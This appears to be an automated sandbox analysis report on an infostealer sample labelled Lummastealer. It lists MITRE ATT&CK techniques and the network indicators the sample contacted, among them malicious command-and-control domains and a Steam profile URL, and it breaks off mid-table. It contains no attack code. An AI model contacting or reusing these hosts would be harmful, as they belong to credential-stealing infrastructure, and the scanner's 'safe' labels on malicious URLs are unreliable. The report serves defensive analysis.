              Source: Yara matchFile source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              yTRd6nkLWV.exe8%VirustotalBrowse
              yTRd6nkLWV.exe37%ReversingLabsWin32.Spyware.Lummastealer
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://aleksandr-block.com/20%Avira URL Cloudsafe
              https://aleksandr-block.com/Q0%Avira URL Cloudsafe
              https://aleksandr-block.com/apizK0%Avira URL Cloudsafe
              https://aleksandr-block.com/pi0%Avira URL Cloudsafe
              https://login.steampowered.c0%Avira URL Cloudsafe
              https://aleksandr-block.com/A40%Avira URL Cloudsafe
              https://aleksandr-block.com/ob0%Avira URL Cloudsafe
              https://aleksandr-block.com/api0%Avira URL Cloudsafe
              https://aleksandr-block.com/pJ0%Avira URL Cloudsafe
              https://status.dropbox.com0%Avira URL Cloudsafe
              https://community.fastly.stea0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              aleksandr-block.com
              188.114.96.3
              truetrue
                unknown
                steamcommunity.com
                104.102.49.254
                truefalse
                  high
                  edge-block-www-env.dropbox-dns.com
                  162.125.66.15
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      www-env.dropbox-dns.com
                      162.125.66.18
                      truefalse
                        high
                        finickypwk.lat
                        unknown
                        unknowntrue
                          unknown
                          washyceehsu.lat
                          unknown
                          unknowntrue
                            unknown
                            kickykiduz.lat
                            unknown
                            unknowntrue
                              unknown
                              shoefeatthe.lat
                              unknown
                              unknowntrue
                                unknown
                                bloodyswif.lat
                                unknown
                                unknowntrue
                                  unknown
                                  savorraiykj.lat
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.dropbox.com
                                    unknown
                                    unknownfalse
                                      high
                                      miniatureyu.lat
                                      unknown
                                      unknowntrue
                                        unknown
                                        ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          leggelatez.lat
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            leggelatez.latfalse
                                              high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                high
                                                kickykiduz.latfalse
                                                  high
                                                  miniatureyu.latfalse
                                                    high
                                                    finickypwk.latfalse
                                                      high
                                                      shoefeatthe.latfalse
                                                        high
                                                        https://aleksandr-block.com/apitrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        washyceehsu.latfalse
                                                          high
                                                          savorraiykj.latfalse
                                                            high
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabyTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElyTRd6nkLWV.exefalse
                                                                high
                                                                https://duckduckgo.com/ac/?q=yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://paper.dropbox.com/cloud-docs/edityTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.gstatic.cn/recaptcha/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.dropbox.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://aleksandr-block.com/A4yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.valvesoftware.com/legal.htmyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.youtube.comyTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsiyTRd6nkLWV.exefalse
                                                                                high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://officeapps-df.live.comyTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://s.ytimg.com;yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://api.login.yahoo.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.certum.pl/CPS0yTRd6nkLWV.exefalse
                                                                                                  high
                                                                                                  https://login.yahoo.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://status.dropbox.comyTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.dropbox.com/playlist/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.innosetup.com/yTRd6nkLWV.exefalse
                                                                                                        high
                                                                                                        https://onedrive.live.com/pickeryTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amyTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.fastly.steamstatic.com/steamcomyTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://aleksandr-block.com/pJyTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://ocsp.rootca1.amazontrust.com0:yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wyTRd6nkLWV.exefalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lv.queniujq.cnyTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://aleksandr-block.com/obyTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://cfl.dropboxstatic.com/static/metaserver/static/css/error.cssyTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://docs.sandbox.google.com/document/fsip/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/recaptcha/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://checkout.steampowered.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgyTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://dl-web.dropbox.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://app.hellofax.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cfl.dropboxstatic.com/static/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aleksandr-block.com/piyTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://crl.certum.pl/ctsca2021.crl0oyTRd6nkLWV.exefalse
                                                                                                                                                    high
                                                                                                                                                    https://aleksandr-block.com/apizKyTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.hellofax.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://help.steampowered.com/en/yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://instructorledlearning.dropboxbusiness.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://recaptcha.net/recaptcha/;yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://aleksandr-block.com/2yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.dropbox.com/pithos/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://sales.dropboxbusiness.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://login.steampowered.cyTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://a.sprig.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comyTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.dropbox.com/encrypted_folder_download/service_worker.jsyTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&ayTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://subca.ocsp-certum.com05yTRd6nkLWV.exefalse
                                                                                                                                                                              high
                                                                                                                                                                              http://x1.c.lencr.org/0yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://x1.i.lencr.org/0yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://subca.ocsp-certum.com02yTRd6nkLWV.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://subca.ocsp-certum.com01yTRd6nkLWV.exefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://repository.certum.pl/ctnca2.cer09yTRd6nkLWV.exefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.dropbox.com/static/api/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-dynamicyTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/workshop/yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://login.steampowered.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allyTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/legal/yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://aleksandr-block.com/QyTRd6nkLWV.exe, 00000001.00000003.1486470955.00000000006FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1yTRd6nkLWV.exefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://docsend.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/jyTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoyTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=BFN_yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steayTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&ayTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://store.steampowered.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.certum.pl/CPS0yTRd6nkLWV.exefalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              162.125.66.18
                                                                                                                                                                                                                              www-env.dropbox-dns.comUnited States
